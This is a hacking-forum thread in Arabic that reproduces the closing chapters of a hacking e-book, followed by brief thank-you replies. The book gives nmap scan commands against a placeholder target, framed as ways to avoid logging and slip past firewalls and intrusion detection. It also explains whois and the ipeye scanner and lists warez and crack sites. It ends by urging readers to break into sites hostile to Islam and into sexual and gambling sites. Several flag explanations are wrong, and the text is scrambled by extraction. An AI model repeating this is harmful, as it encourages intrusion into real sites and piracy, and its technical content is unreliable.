    واا تستخدم كابورت سكان ناتي Nmap بعد معرفتنا في وظيفية الاداة
    لي لكيفية استخدمها بطريقه صحيحه والاستفاده منها بإكبر قدر ممكن
    اوامر هذه الاداه الرائعه :
    nmap -sT www.targthost.com ١- الامر
    يقوم هذا الامر بي اتصال تام مع الموقع ويجري معه مصافحه ثلاثيه ويتم
    كشف عمليتك اذا قمت بعمل سكان على الموقع ويسجل رقم الايبي مالك
    ☺ في ملفات اللوق وهذا الشي احنا مانبيه طبعا
    ٨٠
    وظيفته: nmap -sR www.targthost.com ٢- الامر
    ويحدد هذه RPC يقوم هذا الامر بي مسح كافة المنافذ المفتوحه لخدمات
    او لا وتحدد وتكشف انواع RPC المنافذ هل هي عباره عن خدمات
    سوف اعطيكم RPC AND MOUNTD وارقام النسخ للخدمات
    مثال على خرج الامر هذا انظر
    ١١١/tcp open
    SUNRPC(RPCBIND V٢)
    RPC عرفنا بواسطة الامر هذا نوع ونسخة
    مصمم هذا nmap -sS www.targthost.com ٣- الامر
    الامر لي اختراق الجدارن الناريه يحيث وظيفة هذا الامر يقوم بتحديد البورت
    المحمي بجدار ناري او مسوي عملية فلتره للبورت مثال
    ١٣٥/tcp filtered
    nmap -O www.targthost.com ٤- الامر
    وظيفة هذا الامر يقوم بي التكهن في معرفة النظام ونوعه هل هو لنكس او
    يونكس ....إلخ مثال
    system guess: Linux Kernel ٢,٤,٠ - ٢,٥,٢٠
    nmap -v www.targthost.com ٥- الامر
    وظيفة :هذا الامر يجعلك تتعرف على الخدمات فثلا
    وهكذا مع (send mail) وبورت ٢٥ ( ftp بورت ٢١ (طبعا بورت
    باقي البورتات مثال
    21/tcp open ftp
    ٨١
    22/tcp open ssh
    25/tcp open smtp
    وظيفة الامر : nmap -l www.targthost.com ٦- الامر
    التي تتصنت على بورت IDENTD اذا كان المستضاف البعيد يشغل اداة
    ١١٣ بشكل افتراضي تخبرنا هذي الاداة في التعرف على الملقمات المشغله
    كجذر مثال توضيحي :
    21/tcp open root
    80/tcp open nobody
    22/tcp open root
    nmap -T Sneaky -sS - targthost.com ٧- الامر
    وظيفة الامر : تقوم بمساعدتك على اخفاء المسح عن الجدران الناريه و انظمة
    التي تعتمد على الوقت لكي تكشف عمليات المسح وتميزها IDS الكشف
    عن غيرها
    يقوم بتحديد المده الزمنيه T حيث الامر
    nmap -F targthost.com ٨- الامر
    Ss-Sf-) وضيفة الامر : يقوم الامر بي اجراء بعض عمليات المسح المتسللة
    ويجعلها قادره على التسلل على الجران الناريه وانظمة كشف (sX-Sn
    الدخلاء ولكنه خطير في عمله حيث يقوم بتحطيم الانظمه وقد لا يعمل
    بشكل صحيح في بعض انظمة لنكس
    ٨٢
    ويستخدم الامر هذا في حال انا اردنا نفحص أي موقع فانه Po ٩- امر
    يقوم بي فحصه مباشره ويتقضى عن ارسال بنج للموقع او الايبي لي يتاكد من
    نشاطه ويستخدم غالبا الامر هذا في حال ان بعض المواقع تفسر رزم البنج
    باا حجوم على السيرفر فتمنعها عنه
    (whois) شرح الاداه
    الكاتب: صانع السلالم
    ٨٣
    اداه بسيطه جدا وموفيده بنفس الوقت في اجراء whois تعتبر الاداه
    استعلام عن عنوان ايبي او عنوان سيرفر
    ننتقل إلي عملية كيفية تحديد سيرفرات الاداه والاستفاده منها باكبر قدر ممكن
    انظر الجدول
    الملقم الهدف الهدف
    يعتبر هذا الملقم الافتراضي لي Whois.internic.net
    وهو يتعتبر نقطة whois اداة
    البدايه
    هذا الملقم للزبائنالذين سجلوا Whois.networksolutions.com
    اسماء ميادينهم باستخدام حلول
    الشبكه
    يقوم هذا الامر جلب معلومات Whois.arin.net
    ip عن أي
    whois ملقم قاعدة بيانات Whois.apnic.net
    لمركز معلومات شبكات
    الباسيفيك الاسويه
    حكومي whois ملقم Whois.nic.gov
    جلب معلومات عن الاميل Whois.nic.mail
    فمثلا يجينا الحين واحد يقول ابي استفيد طيب من الشرح
    انا اقوله كيف يستفيد من الشرح راح اشرح ثلاث امثله
    ٨٤
    المثال الاول
    طيب انا الحين عندي عنوان موقع او ايبي ابي معلومات عنه بدون الحاجه إلي
    نقوله طبق الامر هذا whois أي ملقم او سيرفر من سيرفرات
    Whois ١٢٧,٠,٠,١
    وراح الاداه تطبق الملقم او السيرفر الافتراضي لها
    Whois.internic.net إلأي هو
    المثال الثاني
    طيب انا ابي معلومات عن موقع حكومي اسمه
    www.hostnema.gov
    في جلب المعلومات عن الدومين هذا whois اوكي راح نستعين في سيرفر
    www.hostnema.govWhois –h Whois.nic.gov
    المثال الثالث :
    طيب يجيناا واحد ويوقل مثلا انا عندي اميل وابي معلومات عنه نقوله الاداه
    هذا توفر لنا المعلومات عن هذا الاميل مثال
    Whois –h Whois.nic.mail
    al_fttak٩١١@hotmail.com
    وبكذا انتهينا من شرح الاداه ومع عرض جميع ملقماا او سيرفراا واصبحنا
    قادرين على جلب المعلومات عن أي شي نريد
    مع تحيات اخوكم / صانع السلالم
    (hacker the help)
    ٨٥
    ipeye اداة
    الكاتب: صانع السلالم
    مقدمه : الاداه هذي تعتبر من ادوات السكيورتي
    المخصص للعمل في بيئة الوندوز
    الوظيفية :هي عباره عن اداه تقوم في مسح البورتات سواء للجهزه او المواقع
    (بورت سكان)
    يعني شبيه فيها nmap المميزات : تتميز هذه الاداه بي اا قريبه من ااداة
    tcp and fin بمعنى اصح كمااا تقوم بعدة عمليات مسح من ظمنها
    وكما ذي الاداه لا يتم تسجيل أي شي يخصك في ملفات and syn
    اللوق
    او وندوز xp العيوب : من عيوب هذه الاداه اا لا تعمل إلي في وندوز
    ٢٠٠٠
    طريقة التشغيل :
    يعني تضعها في السي ثم تدخل netcat طريقة التشغيل مشاه لي اداة
    عليها من خلال الدوس ا
    الاوامر او طريقة التشغيل :
    طريقة التشغيل لهذه الاداه سهله جدا
    سوف نجري عملية مسح لي ايبي وهمي
    ٨٦
    ( لي الرقم ( ١٢٧,٠,٠,١
    Ipeye ١٢٧,٠,٠________________,١ –syn –p ٢٠ ٨٠
    يستخدم لي اختراق الجدران الناريه وكما قمنا بتحديد مجال syn طبع الامر
    ابحث من ٢٠ إلي ٨٠
    واظن هذا الامرالمهم لنا اذا اردنا فحص اي نظام
    مع تحيات / صانع السلالم
    ٨٧
    بسم الله الرحمن الرحيم
    هذا الجزء من الكتاب سأقوم بتسميته ~ّ~ دليل المواقع~~
    سأعرض افضل المواقع
    وسنبدأ بالتسلسل
    اولا مواقع الامن والحمايه
    وهذه اشهر وافضل مواقع السكيورتى
    SecuriTeam.com
    SecurityFocus
    http://ntsecurity.com-٣
    Insecure.Org - Nmap Free Security Scanner, Tools & Hacking resources
    http://root****l.redi.tk
    --------------------------------------
    تقريبا هذه افضل مواقع السكيورتى والخاصه بأمن الثغرات وآخر اخبارها
    ---------------------------------------
    وهنا قائمه افضل مواقع الكراكات ومحركات بحثها
    اول موقع اعتبره ملك محركات البحث والذي يحتوى على الكثير والكثير
    دليل المواقع
    ٨٨
    هذا الموقع اتمنى ان تضعه مساعدك الاول في جميع ماتحتاجه من مواقع
    سكيورتى ومواقع كراكات واخر صيحات الاكسبلويتات واخر الادوات
    واصداراته والبرامج وغيره وغيره
    موقع قوقل هو ملك محركات البحث والاول في عالمه
    Google
    وهذه بقيه مواقع الكراكات ومحركات بحثها
    warezarchive.org
    /http://www.crack-site.com -٨
    /http://cracks.thebugs.us -٩
    /http://www.crackheaven.com -١٠
    http://www.jtoonen.xs٤all.nl -١١
    LinkWorld: Best Links
    /ch_Engines -١٢
    LinkWorld: Best Links
    -١٣
    logo pens mugs printed pen at scdown.org -١٤
    /http://www.andr.net -١٥
    وهذه اعتبره افضل واشهر منتديات ومواقع الكراكرز
    ٨٩
    لن تكون هذه اية الكتاب وسيصدر له نسخه ثانيه عما قريب
    ولقد قمت بطمس اكثر من ٢٢ موضوع ونقله من هذه الجزء الى الجزء الثاني
    كي تكون متساويان
    وثانيا لم اقوم باضافة دروسي المنتشره بالمواقع ومكتبات الهاكينغ بالانترنت الى
    هذا الكتاب ولم اضيف الا درسين فقط وهم اختراق الانظمة ورياضيات
    الاف تي بي
    وثالثا لم اضيف جميع دروسي التى طرحتها بمنظمة هاكرز بلا حدود هنا
    وهذا ليساعدنى في طرح النسخه الاحترافي لكتاب القرصنة تحت اهر
    وهي التى ستختم دروسي السابقه والجديده في عالم الهاكينغ وستصدر هذه
    النهاية
    ٩٠
    النسخه بعد مايتم طرح نسخه القرصنة تحت اهر الاصدار الثاني ولن
    تكون مجانيه لما تحتويه من مواضيع خطيره
    اما من ناحية جديد اخوكم سوبر كريستال
    هو كتاب المخترقين العرب وكتاب الآمن والحماية
    وسيتم طرحهن بعد فتره ليست بطويله
    نصيحة
    جميع اخوانى الاساتذه في مجال الهاكينغ يحذرون دائما من اختراق المواقع
    العربية
    وانا اختلف معهم في هذه النقطه وليس فقط المواقع العربية التى لانقوم
    باختراقها
    حتى المواقع الاجنبيه لاتقوم بأختراقها اذا لم يكن لها ضرر لك او للدين
    والاسلام او حتى الوطن
    فلأضرب لك مثال
    اذكر بعض المخترقين العرب الذين يدعون الخبره
    يقومون باختراق مواقع ليس لها دخل بالاسلام او بغيره
    ٩١
    فاذكر شخص لن اذكر اسمه هنا قام بأختراق موقع اكادميه والآخر قام
    باختراق موقع جامعة !!!
    هل تعتبر هذا هو الصواب ؟؟؟
    اذا كان نعم فانا اندم على انزال دروس لك
    جميعها مواقع ليس لها دخل بالاسلام بالعكس هي مواقع عادى ومفيده ايضا
    والمفروض نقوم بتحسين صورة الاسلام للعالم كلل وليس تغيير صورة
    الاسلام
    فااذكر لك قصه شخص عزيز علي شخصيَا ولن اذكر اسمه هنا حتى لانشر
    اختراقة او ماشببه
    ولو كان شخص آخر من mp قام المبدع باختراق الموقع الشهير ٣
    المخترقين الموجودين حاليَا بالمنتديات أقل شئ يفعله هو رفع شعاره وتدمير
    الموقع ونشر اختراقه بالمواقع العربية وحتى بالصحف والات كااخواانا
    المتخلفين الذين يدعون ام مخترقين
    المبدع العبقري لم يقوم بتدمير الموقع فقط كل مافعله هو نسخ
    الاكسبلويت وارساله للموقع برسالة تحذير
    تتوقع ماذا كانت ردت فعلهم؟؟
    هل هي مثل المواقع العربية اذا حذرناهم عن ثغره بموقعهم قاموا باسب
    والشتم ؟؟
    بالعكس ردوا عليه بالشكر وتغيرت صورة الاسلام ككل حولهم
    فحكومتهم تزرع الحقد في عقولهم ويدعون ان الاسلام هو الارهاب
    ولكن مجرد شئ بسيط اختراق وتحذيرهم غير صورة آمة كاملة
    ٩٢
    فلماذا لاتقوم بتحسين صورة الاسلام عزيزي القارئ بشتى مواقع الانترنت
    اما من ناحية اخرى وهي المواقع التى انصحك باختراقها
    اولها المواقع التى تسيئ للاسلام والدين والمواقع الجنسية ومواقع القمار
    وغيره من مواقع المراهقين
    ولو اننى بنفسي لم اقوم في حياتى باختراق موقع جنسي او غيره للاننى في
    الواقع لاادخل هذه المواقع حتى اقوم بااختراق او الوقوف خلف صفحاا
    ساعات كي ابحث عن ثغرة تمكني من اختراقها
    واتمنى لك اختراق سعيد وان تستغل موهبتك في شئ يفيدك مثل الحماية وعلم
    الانظمة وغيره من هذه االات والابتعاد عن الاختراق في اشياء لاتفيدك بل
    تسبب لك اضرار لك ولعائلتك ...الخ
    مع اطيب تحية وتمنياتى للجميع بالتوفيق
    SUPER-CRYSTAL
    ooloo٦٠٥@hotmail.com
    ٩٣
    انتهى،،،__



  2. #2
    هكر مجتهد Array
    تاريخ التسجيل
    Jan 2010
    الدولة
    صلاله
    المشاركات
    433

    افتراضي رد: كتاب القرصنة تحت المجهر

    مشكوووووووورررررررررررررر ررر


  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    May 2010
    المشاركات
    1

    افتراضي رد: كتاب القرصنة تحت المجهر

    thnnnnnnnnnnnnnnnnnks



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    May 2010
    المشاركات
    1

    افتراضي رد: كتاب القرصنة تحت المجهر

    wwwwwwwwwwwaaaaaaaaaaaaaaaawwwwwwwwwwwwwww
    مشكووووووووووور


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    May 2010
    المشاركات
    4

    افتراضي رد: كتاب القرصنة تحت المجهر

    شكر للجميع


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2011
    المشاركات
    2

    افتراضي رد: كتاب القرصنة تحت المجهر

    مابين عندي رابط تحميل الكتاب
    ما عم يزبط معي شي ليه ؟



  7. #7
    هكر مجتهد Array الصورة الرمزية chamsou_23i
    تاريخ التسجيل
    Dec 2010
    الدولة
    in the PC
    المشاركات
    384

    افتراضي رد: كتاب القرصنة تحت المجهر

    thankssss tnankkkkkss


  8. #8
    هكر مجتهد Array الصورة الرمزية S.N_StrawHat
    تاريخ التسجيل
    Mar 2011
    الدولة
    Grand Line
    المشاركات
    528

    افتراضي رد: كتاب القرصنة تحت المجهر

    تسلم على الكتاب ...

    تحياتي يا بوس


  9. #9
    هكر نشيط Array الصورة الرمزية Amaady
    تاريخ التسجيل
    Feb 2012
    الدولة
    .:[ أم الدنيــا ( مصر ) ]:.
    المشاركات
    187

    افتراضي رد: كتاب القرصنة تحت المجهر

    تسلم أخوي على الشرح المميز ^^



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2011
    المشاركات
    12

    افتراضي رد: كتاب القرصنة تحت المجهر

    merci mais ou est le lien???????????


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. كتاب لتعليم الاختراق
    بواسطة badrsefrou في المنتدى منتدى إختراق المنتديات
    مشاركات: 100
    آخر مشاركة: 01-07-2013, 09:32 PM
  2. برامج الأمن والحماية.. تحت المجهر
    بواسطة Young.Hacker في المنتدى منتدى حماية الأجهزة
    مشاركات: 7
    آخر مشاركة: 03-18-2012, 06:28 PM
  3. كتاب تعليم لغة xml
    بواسطة زاحف بس ناحف في المنتدى لغات برمجة المواقع
    مشاركات: 19
    آخر مشاركة: 11-22-2011, 04:01 AM
  4. كتاب أعظم 100 رجل
    بواسطة الموت الأسود في المنتدى المنتدى العام
    مشاركات: 30
    آخر مشاركة: 01-13-2010, 01:44 PM
  5. تحميل كتاب (لاتحزن)
    بواسطة محمد عامر في المنتدى المنتدى العام
    مشاركات: 3
    آخر مشاركة: 01-02-2010, 02:15 AM

وجد الزوار هذه الصفحة بالبحث عن:

تحميل كتاب القرصنة تحت المجهر

تحميل كتاب القرصنة تحت المجهر pdf

كتاب القرصنه تحت المجهر

كتاب القرصنة تحت المجهر pdf

١٩٢.١٦٨.١.١

١٢٧.٠.٠.١

كتاب القرصنة تحت المجهر الجزء الثاني

برنامج الوريلنكود

كتاب القرصنة

كتاب القرصنة تحت المجهرالنص التطبيقي القرصنةالقرصنة تحت المجهر pdfكتب القرصنة تحت المجهر١٩٢.١٦٨.٠.١http:www.aljyyosh.comvbshowthread.phpt=3079كتاب دروس القرصنةكتاب في القرصنه١٩٢.١٦٨.١.١ موقعسلبيات و أيجابيات القرصنةكتاب القرصنهكتاب الكتروني لتعليم القرصنه علي الشبكات&amp;#1575;&amp;#1604;&amp;#1602;&amp;#1585;&amp;#1589;&amp;#1606;&amp;#1577; &amp;#1578;&amp;#1581;&amp;#1578; &amp;#1575;&amp;#1604;&amp;#1605;&amp;#1580;&amp;#1607;&amp;#1585;تحميل كتاب مس سي 2012كتاب شامل حول القرصنة بالدوسكتاب القرصنة بعين مجهر

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •